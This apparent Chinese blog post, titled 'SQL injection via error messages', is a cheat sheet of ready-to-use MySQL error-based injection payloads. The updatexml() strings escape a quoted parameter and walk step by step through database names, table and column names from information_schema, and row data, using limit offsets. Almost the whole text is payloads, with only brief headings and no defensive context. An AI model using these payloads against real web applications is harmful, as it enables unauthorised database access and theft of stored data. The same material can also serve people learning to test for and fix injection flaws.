sql注入之报错

发布于 2020-06-24  201 次阅读


获取数据库名

ctc666') and updatexml(1,concat(0x7e,database()),0)#

获取表名 limit一次一次进行表名获取

ctc666') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='数据库名' limit 0,1)),0)#

获取列名

ctc666') and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='表名' limit 0,1)),0)#

获取数据

ctc666') and updatexml(1,concat(0x7e,(select 列名 from 表名 limit 0,1)),0)#

根据条件查找 列名数据

ctc666') and updatexml(1,concat(0x7e,(select 列名 from 表名 where 列名=值 limit 0,1)),0)#


侠之大者,为国为民,侠之小者,为友为邻